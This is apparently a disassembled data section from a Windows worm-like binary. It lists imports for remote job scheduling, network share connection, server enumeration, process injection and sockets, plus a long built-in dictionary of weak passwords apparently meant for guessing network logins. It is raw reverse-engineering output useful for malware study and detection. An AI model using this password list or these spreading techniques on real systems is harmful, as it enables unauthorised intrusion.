dd 74655367h, 756C6156h, 57784565h, 6300h, 51676552h, 79726575h
dd 756C6156h, 57784565h, 0
aRegflushkey db 'RegFlushKey',0
dd 65520000h, 65724367h, 4B657461h, 78457965h, 57h, 43676552h
dd 74616572h, 79654B65h, 417845h, 6E72656Bh, 32336C65h
dd 6C6C642Eh, 2C50000h, 556C7452h, 6E69776Eh, 3790064h
dd 74696157h, 4D726F46h, 69746C75h, 4F656C70h, 63656A62h
dd 7374h, 724600F1h, 694C6565h, 72617262h, 26C0079h, 6E65704Fh
dd 6E657645h, 4174h, 654701DCh, 72655674h, 6E6F6973h, 417845h
dd 654701B7h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 320041h, 736F6C43h, 6E614865h, 656C64h, 6C4701F2h, 6C61626Fh
dd 65657246h, 1EB0000h, 626F6C47h, 6C416C61h, 636F6Ch
dd 65470169h, 73614C74h, 72724574h, 726Fh, 6547013Ch, 72754374h
dd 746E6572h, 636F7250h, 737365h, 6957037Fh, 68436564h
dd 6F547261h, 746C754Dh, 74794269h, 1DB0065h, 56746547h
dd 69737265h, 6E6Fh, 6F4D025Fh, 69466576h, 7845656Ch, 25E0041h
dd 65766F4Dh, 656C6946h, 1C90041h, 54746547h, 50706D65h
dd 41687461h, 33F0000h, 65656C53h, 820070h, 656C6544h
dd 69466574h, 41656Ch, 6F4C0253h, 69466B63h, 656Ch, 6547015Ch
dd 6C694674h, 7A695365h, 500065h, 61657243h, 69466574h
dd 41656Ch, 7243006Dh, 65746165h, 65726854h, 8006461h
dd 65530301h, 72724574h, 6F4D726Fh, 20006564h, 784500B7h
dd 72507469h, 7365636Fh, 2730073h, 6E65704Fh, 6574754Dh
dd 0CC004178h, 6547010Ah, 6D6F4374h, 646E616Dh, 656E694Ch
dd 5D0041h, 61657243h, 754D6574h, 41786574h, 10E8B00h
dd 43746547h, 75706D6Fh, 4E726574h, 41656D61h, 1747500h
dd 4D746547h, 6C75646Fh, 6C694665h, 6D614E65h, 0C0004165h
dd 6547013Dh, 72754374h, 746E6572h, 636F7250h, 49737365h
dd 8A0064h, 61736944h, 54656C62h, 61657268h, 62694C64h
dd 79726172h, 6C6C6143h, 890073h, 69766544h, 6F496563h
dd 746E6F43h, 6C6F72h, 7257038Ch, 46657469h, 656C69h, 654701C7h
dd 6D655474h, 6C694670h, 6D614E65h, 85004165h, 6956036Eh
dd 61757472h, 6572466Ch, 1980065h, 50746547h, 41636F72h
dd 65726464h, 0C7007373h, 6F4C0242h, 694C6461h, 72617262h
dd 24004179h, 6956036Bh, 61757472h, 6C6C416Ch, 4400636Fh
dd 79530344h, 6D657473h, 656D6954h, 69466F54h, 6954656Ch
dd 0CC00656Dh, 654701BCh, 73795374h, 546D6574h, 656D69h
dd 654C0241h, 43657661h, 69746972h, 536C6163h, 69746365h
dd 0D9006E6Fh, 6E450097h, 43726574h, 69746972h, 536C6163h
dd 69746365h, 1006E6Fh, 6E490216h, 61697469h, 657A696Ch
dd 74697243h, 6C616369h, 74636553h, 6E6F69h, 655202A4h
dd 69466461h, 0C200656Ch, 6F43003Ah, 63656E6Eh, 6D614E74h
dd 69506465h, 4006570h, 7243005Fh, 65746165h, 656D614Eh
dd 70695064h, 6E004165h, 65440083h, 6574656Ch, 656C6946h
dd 16B0057h, 4C746547h, 6C61636Fh, 656D6954h, 536600h
dd 61657243h, 69466574h, 57656Ch, 694600CDh, 6C43646Eh
dd 65736Fh, 694600D4h, 6946646Eh, 46747372h, 57656C69h
dd 2652400h, 746C754Dh, 74794269h, 576F5465h, 43656469h
dd 726168h, 65470111h, 6D6F4374h, 65747570h, 6D614E72h
dd 5765h, 65540348h, 6E696D72h, 54657461h, 61657268h, 13F0064h
dd 43746547h, 65727275h, 6854746Eh, 64616572h, 0FF006449h
dd 6157037Bh, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 2BF0074h, 4C746553h, 45747361h, 726F7272h, 25CF600h
dd 75646F4Dh, 3233656Ch, 7478654Eh, 25AC200h, 75646F4Dh
dd 3233656Ch, 73726946h, 700074h, 61657243h, 6F546574h
dd 65686C6Fh, 3233706Ch, 70616E53h, 746F6873h, 32E6800h
dd 54746553h, 61657268h, 69725064h, 7469726Fh, 3710079h
dd 74726956h, 506C6175h, 65746F72h, 0FF007463h, 654701CEh
dd 72685474h, 50646165h, 726F6972h, 797469h, 6547013Eh
dd 72754374h, 746E6572h, 65726854h, 89006461h, 65470176h
dd 646F4D74h, 48656C75h, 6C646E61h, 0FF004165h, 72430048h
dd 65746165h, 65726944h, 726F7463h, 4004179h, 694600D1h
dd 6946646Eh, 46747372h, 41656C69h, 1DE8900h, 56746547h
dd 6D756C6Fh, 666E4965h, 616D726Fh, 6E6F6974h, 14C0041h
dd 44746547h, 65766972h, 65707954h, 1700041h, 4C746547h
dd 6369676Fh, 72446C61h, 73657669h, 1D28B00h, 54746547h
dd 436B6369h, 746E756Fh, 2928B00h, 72657551h, 72655079h
dd 6D726F66h, 65636E61h, 6E756F43h, 726574h, 6553030Bh
dd 6C694674h, 6D695465h, 15E0065h, 46746547h, 54656C69h
dd 656D69h, 65480203h, 6C417061h, 636F6Ch, 6547019Bh, 6F725074h
dd 73736563h, 70616548h, 2090000h, 70616548h, 65657246h
dd 2874000h, 636F7250h, 33737365h, 78654E32h, 2850074h
dd 636F7250h, 33737365h, 72694632h, 7473h, 6854034Bh, 64616572h
dd 654E3233h, 7478h, 704F0279h, 68546E65h, 64616572h, 34A2E00h
dd 65726854h, 32336461h, 73726946h, 680074h, 61657243h
dd 65526574h, 65746F6Dh, 65726854h, 6461h, 72570395h, 50657469h
dd 65636F72h, 654D7373h, 79726F6Dh, 36C0000h, 74726956h
dd 416C6175h, 636F6C6Ch, 7845h, 704F0275h, 72506E65h, 7365636Fh
dd 2A70073h, 64616552h, 636F7250h, 4D737365h, 726F6D65h
dd 3050079h, 46746553h, 41656C69h, 69727474h, 65747562h
dd 4173h, 65470157h, 6C694674h, 74744165h, 75626972h, 41736574h
dd 13A0000h, 43746547h, 65727275h, 6944746Eh, 74636572h
dd 4179726Fh, 630000h, 61657243h, 72506574h, 7365636Fh
dd 4173h, 6E490219h, 6C726574h, 656B636Fh, 6D6F4364h, 65726170h
dd 68637845h, 65676E61h, 21A0000h, 65746E49h, 636F6C72h
dd 4464656Bh, 65726365h, 746E656Dh, 21E0000h, 65746E49h
dd 636F6C72h, 4964656Bh, 6572636Eh, 746E656Dh, 3020000h
dd 45746553h, 746E6576h, 4C0000h, 61657243h, 76456574h
dd 41746E65h, 21B0000h, 65746E49h, 636F6C72h, 4564656Bh
dd 61686378h, 65676Eh, 2E72706Dh, 6C6C64h, 4E570000h, 64417465h
dd 6E6F4364h, 7463656Eh, 326E6F69h, 57h, 74654E57h, 43646441h
dd 656E6E6Fh, 6F697463h, 41326Eh, 4E570000h, 61437465h
dd 6C65636Eh, 6E6E6F43h, 69746365h, 41326E6Fh, 0
aWnetcancelconn db 'WNetCancelConnection2W',0
align 10h
aMsvcrt_dll db 'msvcrt.dll',0
align 4
dd 695F0000h, 7474696Eh, 6D7265h, 615F0000h, 73756A64h
dd 64665F74h, 7669h, 61630000h, 636F6C6Ch, 0
aSscanf db 'sscanf',0
align 4
dd 656D0000h, 766F6D6Dh, 65h, 61657362h, 686372h, 616C0000h
dd 7362h, 69730000h, 6Eh, 676F6Ch, 74730000h, 6B6F7472h
dd 0
aAtoi db 'atoi',0
align 4
a_wcsdup db '_wcsdup',0
dd 72700000h, 66746E69h, 0
aStrcpy db 'strcpy',0
align 4
dd 74730000h, 706D6372h, 0
aStrcat db 'strcat',0
align 4
dd 63770000h, 72747373h, 0
a_strlwr db '_strlwr',0
dd 74730000h, 72747372h, 0
a_strdup db '_strdup',0
dd 63770000h, 70636E73h, 79h, 6C6C616Dh, 636Fh, 72660000h
dd 6565h, 65720000h, 6F6C6C61h, 63h, 63736377h, 7461h
dd 63770000h, 79706373h, 0
aWcscmp db 'wcscmp',0
align 4
dd 735F0000h, 7270776Eh, 66746E69h, 0
aWcslen db 'wcslen',0
align 4
dd 74730000h, 72686372h, 0
aMemset db 'memset',0
align 10h
dd 656D0000h, 7970636Dh, 0
aMemcmp db 'memcmp',0
align 4
dd 74730000h, 61636E72h, 74h, 6E617273h, 64h, 646E6172h
dd 0
a_snprintf db '_snprintf',0
align 4
aStrncpy db 'strncpy',0
dd 74730000h, 68637272h, 72h, 7274735Fh, 6D63696Eh, 70h
dd 6C727473h, 6E65h, 735F0000h, 63697274h, 706Dh, 6D5F0000h
dd 63696D65h, 706Dh, 6174656Eh, 32336970h, 6C6C642Eh, 0
aNetapibufferfr db 'NetApiBufferFree',0
align 10h
aNetschedulejob db 'NetScheduleJobDel',0
align 4
aNetschedulej_0 db 'NetScheduleJobEnum',0
align 4
dd 654E0000h, 68635374h, 6C756465h, 626F4A65h, 646441h
dd 654E0000h, 65735574h, 756E4572h, 6Dh, 5374654Eh, 65767265h
dd 756E4572h, 6Dh, 5774654Eh, 6174736Bh, 49746547h, 6F666Eh
dd 61656C6Fh, 32337475h, 6C6C642Eh, 4100h, 53737953h, 6E697274h
dd 6E654C67h, 4100h, 69726156h, 49746E61h, 74696Eh, 79530000h
dd 65724673h, 72745365h, 676E69h, 79530000h, 6C6C4173h
dd 7453636Fh, 676E6972h, 6900h, 69726156h, 43746E61h, 7261656Ch
dd 70726900h, 34747263h, 6C6C642Eh, 0
aRpcbindingfrom db 'RpcBindingFromStringBindingA',0
aE db 'e',0
align 4
aRpcstringbindi db 'RpcStringBindingComposeA',0
aI db 'i',0
align 4
aNdrclientcall2 db 'NdrClientCall2',0
aN_0 db 'n',0
align 2
aRpcbindingfree db 'RpcBindingFree',0
aOshell32_dll db 'oshell32.dll',0
align 4
aShgetsetsettin db 'SHGetSetSettings',0
aI_0 db 'I',0
align 4
aShgetspecialfo db 'SHGetSpecialFolderPathA',0
aShlwapi_dll db 'shlwapi.dll',0
dd 74530000h, 72745372h, 4C004149h, 74530000h, 72745372h
dd 5749h, 72657375h, 642E3233h, 65006C6Ch, 65470000h, 73614C74h
dd 706E4974h, 6E497475h, 6F66h, 6F500000h, 654D7473h, 67617373h
dd 6B004165h, 65470000h, 676C4474h, 6D657449h, 6F00h, 64616F4Ch
dd 69727453h, 41676Eh, 65440000h, 6E695766h, 50776F64h
dd 41636F72h, 7300h, 70736944h, 68637461h, 7373654Dh, 41656761h
dd 0
aTranslatemessa db 'TranslateMessage',0
align 4
aRegisterclassa db 'RegisterClassA',0
align 4
dd 6E450000h, 68546D75h, 64616572h, 646E6957h, 73776Fh
dd 65470000h, 73654D74h, 65676173h, 41h, 61657243h, 69576574h
dd 776F646Eh, 417845h, 73726576h, 2E6E6F69h, 6C6C64h, 65470000h
dd 6C694674h, 72655665h, 6E6F6973h, 6F666E49h, 41h, 51726556h
dd 79726575h, 756C6156h, 4165h, 65470000h, 6C694674h, 72655665h
dd 6E6F6973h, 6F666E49h, 657A6953h, 69770041h, 656E696Eh
dd 6C642E74h, 6Ch, 65746E49h, 74656E72h, 736F6C43h, 6E614865h
dd 656C64h, 6E490000h, 6E726574h, 704F7465h, 416E65h, 6E490000h
dd 6E726574h, 65477465h, 6E6F4374h, 7463656Eh, 74536465h
dd 657461h, 6E490000h, 6E726574h, 65527465h, 69466461h
dd 656Ch, 6E490000h, 6E726574h, 704F7465h, 72556E65h, 416Ch
dd 74480000h, 75517074h, 49797265h, 416F666Eh, 73770000h
dd 32335F32h, 6C6C642Eh, 0
aAccept db 'accept',0
align 4
dd 69620000h, 646Eh, 65670000h, 636F7374h, 6D616E6Bh, 65h
dd 646E6573h, 6F74h, 53570000h, 61745341h, 70757472h, 0
aSetsockopt db 'setsockopt',0
align 4
dd 746E0000h, 6C686Fh, 696C0000h, 6E657473h, 0
aShutdown db 'shutdown',0
align 4
aGethostbyname db 'gethostbyname',0
align 4
aNtohl db 'ntohl',0
align 10h
aNtohs db 'ntohs',0
align 4
aConnect db 'connect',0
dd 53570000h, 74654741h, 7473614Ch, 6F727245h, 72h, 646E6573h
dd 0
aSelect db 'select',0
align 4
dd 65670000h, 736F6874h, 6D616E74h, 65h, 74656E69h, 6F746E5Fh
dd 61h, 74656E69h, 6464615Fh, 72h, 736F6C63h, 636F7365h
dd 74656Bh
dword_9A25D8 dd 53570000h, 636F4941h, 6C74h ; DATA XREF: sub_9A7C5E+2�o
; char byte_9A25E4[]
byte_9A25E4 db 2 dup(0) ; DATA XREF: sub_9A7E49+27�o
a__wsafdisset db '__WSAFDIsSet',0
aS_1 db 's',0
align 2
dw 6F69h
aCtlsocket db 'ctlsocket',0 ; DATA XREF: sub_9A7E49+5�o
align 4
; char WindowName[]
WindowName db 'recv',0 ; DATA XREF: sub_9A7F37+1D�o
; sub_9A9318+9�r ...
db '\',0
align 4
dd 53415357h, 614C7465h, 72457473h
; char PrefixString[]
PrefixString db 'ror',0 ; DATA XREF: sub_9A7F9D+4B�o
; sub_9AD473+32�o ...
; const CHAR byte_9A261C
byte_9A261C db 0 ; DATA XREF: sub_9A878B+D�o
; sub_9A8B47+33�o
align 2
aSocket db 'socket',0
aMole32_dll db 'Mole32.dll',0
db 0
align 2
aCoinitializese db 'CoInitializeSecurity',0
aP db 'p',0
align 2
dw 6F43h
dd 61657243h
; char dword_9A2650[]
dword_9A2650 dd 6E496574h ; DATA XREF: sub_9A878B+8�o
; sub_9A8B47+2E�o
; char aStance[]
aStance db 'stance',0 ; DATA XREF: sub_9A84E1+F�o
; sub_9A8579+70�o
aE_0 db 'E',0
align 2
aCouninitialize db 'CoUninitialize',0
aS_2 db 's',0
align 10h
aCoinitializeex db 'CoInitializeEx',0
aPurlmon_dll db 'purlmon.dll',0 ; DATA XREF: sub_9A84E1+A�o
; sub_9A8579+6B�o
align 4
; char byte_9A268C[]
byte_9A268C db 2 dup(0) ; DATA XREF: sub_9A8D3E+2A�o
aObtainuseragen db 'ObtainUserAgentString',0
dword_9A26A4 dd 70747468h ; DATA XREF: sub_9A8E01+72�r
; sub_9AD312+5�r
dword_9A26A8 dd 2F2F3Ah ; DATA XREF: sub_9A8E01+7A�r
; sub_9AD312+D�r
align 10h
stru_9A26B0 _msEH <0FFFFFFFFh, offset loc_9A90DE, offset loc_9A90E2>
; DATA XREF: sub_9A9067+5�o
; char aSoftwareMicros[]
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Applets',0
; DATA XREF: sub_9A91B5+C�o
; sub_9A91E7+19�o
; char word_9A26EE[]
word_9A26EE dw 0 ; DATA XREF: sub_9A91B5+6�o
; sub_9A91E7+13�o
dword_9A26F0 dd 706967h, 2 dup(39393939h), 0 ; DATA XREF: .text:009BA3F0�o
a9999999 db '9999999',0 ; DATA XREF: .text:009BA3EC�o
a999999 db '999999',0 ; DATA XREF: .text:009BA3E8�o
align 10h
a99999 db '99999',0 ; DATA XREF: .text:009BA3E4�o
align 4
a9999 db '9999',0 ; DATA XREF: .text:009BA3E0�o
align 10h
a999 db '999',0 ; DATA XREF: .text:009BA3DC�o
a99 db '99',0 ; DATA XREF: .text:009BA3D8�o
align 4
a9: ; DATA XREF: .text:009BA3D4�o
unicode 0, <9>,0
a88888888 db '88888888',0 ; DATA XREF: .text:009BA3D0�o
align 4
a8888888 db '8888888',0 ; DATA XREF: .text:009BA3CC�o
a888888 db '888888',0 ; DATA XREF: .text:009BA3C8�o
align 4
a88888 db '88888',0 ; DATA XREF: .text:009BA3C4�o
align 10h
a8888 db '8888',0 ; DATA XREF: .text:009BA3C0�o
align 4
a888 db '888',0 ; DATA XREF: .text:009BA3BC�o
a88 db '88',0 ; DATA XREF: .text:009BA3B8�o
align 10h
a8: ; DATA XREF: .text:009BA3B4�o
unicode 0, <8>,0
a77777777 db '77777777',0 ; DATA XREF: .text:009BA3B0�o
align 10h
a7777777 db '7777777',0 ; DATA XREF: .text:009BA3AC�o
a777777 db '777777',0 ; DATA XREF: .text:009BA3A8�o
align 10h
a77777 db '77777',0 ; DATA XREF: .text:009BA3A4�o
align 4
a7777 db '7777',0 ; DATA XREF: .text:009BA3A0�o
align 10h
a777 db '777',0 ; DATA XREF: .text:009BA39C�o
a77 db '77',0 ; DATA XREF: .text:009BA398�o
align 4
a7: ; DATA XREF: .text:009BA394�o
unicode 0, <7>,0
a66666666 db '66666666',0 ; DATA XREF: .text:009BA390�o
align 4
a6666666 db '6666666',0 ; DATA XREF: .text:009BA38C�o
a666666 db '666666',0 ; DATA XREF: .text:009BA388�o
align 4
a66666 db '66666',0 ; DATA XREF: .text:009BA384�o
align 10h
a6666 db '6666',0 ; DATA XREF: .text:009BA380�o
align 4
a666 db '666',0 ; DATA XREF: .text:009BA37C�o
a66 db '66',0 ; DATA XREF: .text:009BA378�o
align 10h
a6: ; DATA XREF: .text:009BA374�o
unicode 0, <6>,0
a55555555 db '55555555',0 ; DATA XREF: .text:009BA370�o
align 10h
a5555555 db '5555555',0 ; DATA XREF: .text:009BA36C�o
a555555 db '555555',0 ; DATA XREF: .text:009BA368�o
align 10h
a55555 db '55555',0 ; DATA XREF: .text:009BA364�o
align 4
a5555 db '5555',0 ; DATA XREF: .text:009BA360�o
align 10h
a555 db '555',0 ; DATA XREF: .text:009BA35C�o
a55 db '55',0 ; DATA XREF: .text:009BA358�o
align 4
a5: ; DATA XREF: .text:009BA354�o
unicode 0, <5>,0
a44444444 db '44444444',0 ; DATA XREF: .text:009BA350�o
align 4
a4444444 db '4444444',0 ; DATA XREF: .text:009BA34C�o
a444444 db '444444',0 ; DATA XREF: .text:009BA348�o
align 4
a44444 db '44444',0 ; DATA XREF: .text:009BA344�o
align 10h
a4444 db '4444',0 ; DATA XREF: .text:009BA340�o
align 4
a444 db '444',0 ; DATA XREF: .text:009BA33C�o
a44 db '44',0 ; DATA XREF: .text:009BA338�o
align 10h
a4: ; DATA XREF: .text:009BA334�o
unicode 0, <4>,0
a33333333 db '33333333',0 ; DATA XREF: .text:009BA330�o
align 10h
a3333333 db '3333333',0 ; DATA XREF: .text:009BA32C�o
a333333 db '333333',0 ; DATA XREF: .text:009BA328�o
align 10h
a33333 db '33333',0 ; DATA XREF: .text:009BA324�o
align 4
a3333 db '3333',0 ; DATA XREF: .text:009BA320�o
align 10h
a333 db '333',0 ; DATA XREF: .text:009BA31C�o
a33 db '33',0 ; DATA XREF: .text:009BA318�o
align 4
a3: ; DATA XREF: .text:009BA314�o
unicode 0, <3>,0
a22222222 db '22222222',0 ; DATA XREF: .text:009BA310�o
align 4
a2222222 db '2222222',0 ; DATA XREF: .text:009BA30C�o
a222222 db '222222',0 ; DATA XREF: .text:009BA308�o
align 4
a22222 db '22222',0 ; DATA XREF: .text:009BA304�o
align 10h
a2222 db '2222',0 ; DATA XREF: .text:009BA300�o
align 4
a222 db '222',0 ; DATA XREF: .text:009BA2FC�o
a22 db '22',0 ; DATA XREF: .text:009BA2F8�o
align 10h
a2: ; DATA XREF: .text:009BA2F4�o
unicode 0, <2>,0
a11111111 db '11111111',0 ; DATA XREF: .text:009BA2F0�o
align 10h
a1111111 db '1111111',0 ; DATA XREF: .text:009BA2EC�o
a111111 db '111111',0 ; DATA XREF: .text:009BA2E8�o
align 10h
a11111 db '11111',0 ; DATA XREF: .text:009BA2E4�o
align 4
a1111 db '1111',0 ; DATA XREF: .text:009BA2E0�o
align 10h
a111 db '111',0 ; DATA XREF: .text:009BA2DC�o
a11 db '11',0 ; DATA XREF: .text:009BA2D8�o
align 4
a1: ; DATA XREF: sub_9B6663+8F�o
; .text:009BA2D4�o
unicode 0, <1>,0
a00000000 db '00000000',0 ; DATA XREF: .text:009BA2D0�o
align 4
a0000000 db '0000000',0 ; DATA XREF: .text:009BA2CC�o
a00000 db '00000',0 ; DATA XREF: .text:009BA2C4�o
; .text:009BA2C8�o
align 4
a0000 db '0000',0 ; DATA XREF: .text:009BA2C0�o
align 10h
a000 db '000',0 ; DATA XREF: .text:009BA2BC�o
a00 db '00',0 ; DATA XREF: .text:009BA2B8�o
align 4
a0987654321 db '0987654321',0 ; DATA XREF: .text:009BA2B0�o
align 4
a987654321 db '987654321',0 ; DATA XREF: .text:009BA2AC�o
align 10h
a87654321 db '87654321',0 ; DATA XREF: .text:009BA2A8�o
align 4
a7654321 db '7654321',0 ; DATA XREF: .text:009BA2A4�o
a654321 db '654321',0 ; DATA XREF: .text:009BA2A0�o
align 4
a54321 db '54321',0 ; DATA XREF: .text:009BA29C�o
align 4
a4321 db '4321',0 ; DATA XREF: .text:009BA298�o
align 4
a321 db '321',0 ; DATA XREF: .text:009BA294�o
a21 db '21',0 ; DATA XREF: .text:009BA290�o
align 4
a12 db '12',0 ; DATA XREF: .text:009BA28C�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .text:009BA288�o
align 10h
aZzzzz db 'zzzzz',0 ; DATA XREF: .text:009BA284�o
align 4
aZzzz db 'zzzz',0 ; DATA XREF: .text:009BA280�o
align 10h
aZzz db 'zzz',0 ; DATA XREF: .text:009BA27C�o
aXxxxx db 'xxxxx',0 ; DATA XREF: .text:009BA278�o
align 4
aXxxx db 'xxxx',0 ; DATA XREF: .text:009BA274�o
align 4
aXxx db 'xxx',0 ; DATA XREF: .text:009BA270�o
aQqqqq db 'qqqqq',0 ; DATA XREF: .text:009BA26C�o
align 10h
aQqqq db 'qqqq',0 ; DATA XREF: .text:009BA268�o
align 4
aQqq db 'qqq',0 ; DATA XREF: .text:009BA264�o
aAaaaa db 'aaaaa',0 ; DATA XREF: .text:009BA260�o
align 4
aAaaa db 'aaaa',0 ; DATA XREF: .text:009BA25C�o
align 4
aAaa_0 db 'aaa',0 ; DATA XREF: .text:009BA258�o
aSql db 'sql',0 ; DATA XREF: .text:009BA254�o
aFile db 'file',0 ; DATA XREF: .text:009BA250�o
align 4
aWeb db 'web',0 ; DATA XREF: .text:009BA24C�o
aFoo db 'foo',0 ; DATA XREF: .text:009BA248�o
aJob db 'job',0 ; DATA XREF: .text:009BA244�o
aHome db 'home',0 ; DATA XREF: .text:009BA240�o
align 10h
aWork db 'work',0 ; DATA XREF: .text:009BA23C�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .text:009BA238�o
align 4
aController db 'controller',0 ; DATA XREF: .text:009BA234�o
align 10h
aKiller db 'killer',0 ; DATA XREF: .text:009BA230�o
align 4
aGames db 'games',0 ; DATA XREF: .text:009BA22C�o
align 10h
aPrivate db 'private',0 ; DATA XREF: .text:009BA228�o
aMarket db 'market',0 ; DATA XREF: .text:009BA224�o
align 10h
aCoffee db 'coffee',0 ; DATA XREF: .text:009BA220�o
align 4
aCookie db 'cookie',0 ; DATA XREF: .text:009BA21C�o
align 10h
aForever db 'forever',0 ; DATA XREF: .text:009BA218�o
aFreedom db 'freedom',0 ; DATA XREF: .text:009BA214�o
aStudent db 'student',0 ; DATA XREF: .text:009BA210�o
aAccount db 'account',0 ; DATA XREF: .text:009BA20C�o
aAcademia db 'academia',0 ; DATA XREF: .text:009BA208�o
align 4
aFiles db 'files',0 ; DATA XREF: .text:009BA204�o
align 4
aWindows db 'windows',0 ; DATA XREF: .text:009BA200�o
aMonitor db 'monitor',0 ; DATA XREF: .text:009BA1FC�o
aUnknown db 'unknown',0 ; DATA XREF: .text:009BA1F8�o
aAnything db 'anything',0 ; DATA XREF: .text:009BA1F4�o
align 4
aLetitbe db 'letitbe',0 ; DATA XREF: .text:009BA1F0�o
aLetmein db 'letmein',0 ; DATA XREF: .text:009BA1EC�o
aDomain db 'domain',0 ; DATA XREF: .text:009BA1E8�o
align 10h
aAccess db 'access',0 ; DATA XREF: .text:009BA1E4�o
align 4
aMoney db 'money',0 ; DATA XREF: .text:009BA1E0�o
align 10h
aCampus db 'campus',0 ; DATA XREF: .text:009BA1DC�o
align 4
aExplorer db 'explorer',0 ; DATA XREF: .text:009BA1D8�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .text:009BA1D4�o
align 10h
aCustomer db 'customer',0 ; DATA XREF: .text:009BA1D0�o
align 4
aCluster db 'cluster',0 ; DATA XREF: .text:009BA1CC�o
aNobody db 'nobody',0 ; DATA XREF: .text:009BA1C8�o
align 4
aCodeword db 'codeword',0 ; DATA XREF: .text:009BA1C4�o
align 4
aCodename db 'codename',0 ; DATA XREF: .text:009BA1C0�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .text:009BA1BC�o
align 10h
aDesktop db 'desktop',0 ; DATA XREF: .text:009BA1B8�o
aSecurity db 'security',0 ; DATA XREF: .text:009BA1B4�o
align 4
aSecure db 'secure',0 ; DATA XREF: .text:009BA1B0�o
align 4
aPublic db 'public',0 ; DATA XREF: .text:009BA1AC�o
align 4
aSystem db 'system',0 ; DATA XREF: .text:009BA1A8�o
align 4
aShadow db 'shadow',0 ; DATA XREF: .text:009BA1A4�o
align 4
aOffice db 'office',0 ; DATA XREF: .text:009BA1A0�o
align 4
aSupervisor db 'supervisor',0 ; DATA XREF: .text:009BA19C�o
align 4
aSuperuser db 'superuser',0 ; DATA XREF: .text:009BA198�o
align 4
aShare db 'share',0 ; DATA XREF: .text:009BA194�o
align 4
aSuper db 'super',0 ; DATA XREF: .text:009BA190�o
align 4
aSecret db 'secret',0 ; DATA XREF: .text:009BA18C�o
align 4
aServer db 'server',0 ; DATA XREF: .text:009BA188�o
align 4
aComputer db 'computer',0 ; DATA XREF: .text:009BA184�o
align 10h
aOwner db 'owner',0 ; DATA XREF: .text:009BA180�o
align 4
aBackup db 'backup',0 ; DATA XREF: .text:009BA17C�o
align 10h
aDatabase db 'database',0 ; DATA XREF: .text:009BA178�o
align 4
aLotus db 'lotus',0 ; DATA XREF: .text:009BA174�o
align 4
aOracle db 'oracle',0 ; DATA XREF: .text:009BA170�o
align 4
aBusiness db 'business',0 ; DATA XREF: .text:009BA16C�o
align 4
aManager db 'manager',0 ; DATA XREF: .text:009BA168�o
aTemporary db 'temporary',0 ; DATA XREF: .text:009BA164�o
align 4
aIhavenopass db 'ihavenopass',0 ; DATA XREF: .text:009BA160�o
aNothing db 'nothing',0 ; DATA XREF: .text:009BA15C�o
aNopassword db 'nopassword',0 ; DATA XREF: .text:009BA158�o
align 4
aNopass db 'nopass',0 ; DATA XREF: .text:009BA154�o
align 4
aInternet db 'Internet',0 ; DATA XREF: .text:009BA150�o
align 10h
aInternet_0 db 'internet',0 ; DATA XREF: .text:009BA14C�o
align 4
aExample db 'example',0 ; DATA XREF: .text:009BA148�o
aSample db 'sample',0 ; DATA XREF: .text:009BA144�o
align 4
aLove123 db 'love123',0 ; DATA XREF: .text:009BA140�o
aBoss123 db 'boss123',0 ; DATA XREF: .text:009BA13C�o
aWork123 db 'work123',0 ; DATA XREF: .text:009BA138�o
aHome123 db 'home123',0 ; DATA XREF: .text:009BA134�o
aMypc123 db 'mypc123',0 ; DATA XREF: .text:009BA130�o
aTemp123 db 'temp123',0 ; DATA XREF: .text:009BA12C�o
aTest123 db 'test123',0 ; DATA XREF: .text:009BA128�o
aQwe123 db 'qwe123',0 ; DATA XREF: .text:009BA124�o
align 4
aAbc123 db 'abc123',0 ; DATA XREF: .text:009BA120�o
align 4
aPw123 db 'pw123',0 ; DATA XREF: .text:009BA11C�o
align 4
aRoot123 db 'root123',0 ; DATA XREF: .text:009BA118�o
aPass123 db 'pass123',0 ; DATA XREF: .text:009BA114�o
aPass12 db 'pass12',0 ; DATA XREF: .text:009BA110�o
align 4
aPass1 db 'pass1',0 ; DATA XREF: .text:009BA10C�o
align 4
aAdmin123 db 'admin123',0 ; DATA XREF: .text:009BA108�o
align 4
aAdmin12 db 'admin12',0 ; DATA XREF: .text:009BA104�o
aAdmin1 db 'admin1',0 ; DATA XREF: .text:009BA100�o
align 4
aPassword123 db 'password123',0 ; DATA XREF: .text:009BA0FC�o
aPassword12 db 'password12',0 ; DATA XREF: .text:009BA0F8�o
align 10h
aPassword1 db 'password1',0 ; DATA XREF: .text:009BA0F4�o
align 4
aDefault db 'default',0 ; DATA XREF: .text:009BA0F0�o
aFoobar db 'foobar',0 ; DATA XREF: .text:009BA0EC�o
align 4
aFoofoo db 'foofoo',0 ; DATA XREF: .text:009BA0E8�o
align 4
aTemptemp db 'temptemp',0 ; DATA XREF: .text:009BA0E4�o
align 10h
aTemp db 'temp',0 ; DATA XREF: .text:009BA0E0�o
align 4
aTesttest db 'testtest',0 ; DATA XREF: .text:009BA0DC�o
align 4
aTest db 'test',0 ; DATA XREF: .text:009BA0D8�o
align 4
aRootroot db 'rootroot',0 ; DATA XREF: .text:009BA0D4�o
align 4
aRoot db 'root',0 ; DATA XREF: .text:009BA0D0�o
align 10h
aAdminadmin db 'adminadmin',0 ; DATA XREF: .text:009BA0CC�o
align 4
aMypassword db 'mypassword',0 ; DATA XREF: .text:009BA0C8�o
align 4
aMypass db 'mypass',0 ; DATA XREF: .text:009BA0C4�o
align 10h
aPass db 'pass',0 ; DATA XREF: .text:009BA0C0�o
align 4
aLogin db 'Login',0 ; DATA XREF: .text:009BA0BC�o
align 10h
aLogin_0 db 'login',0 ; DATA XREF: .text:009BA0B8�o
align 4
aPassword db 'Password',0 ; DATA XREF: .text:009BA0B4�o
align 4
aPassword_0 db 'password',0 ; DATA XREF: .text:009BA0B0�o
align 10h
aPasswd db 'passwd',0 ; DATA XREF: .text:009BA0AC�o
align 4
aZxcvbn db 'zxcvbn',0 ; DATA XREF: .text:009BA0A8�o
align 10h
aZxcvb db 'zxcvb',0 ; DATA XREF: .text:009BA0A4�o
align 4
aZxccxz db 'zxccxz',0 ; DATA XREF: .text:009BA0A0�o
align 10h
aZxcxz db 'zxcxz',0 ; DATA XREF: .text:009BA09C�o
align 4
aQazwsxedc db 'qazwsxedc',0 ; DATA XREF: .text:009BA098�o
align 4
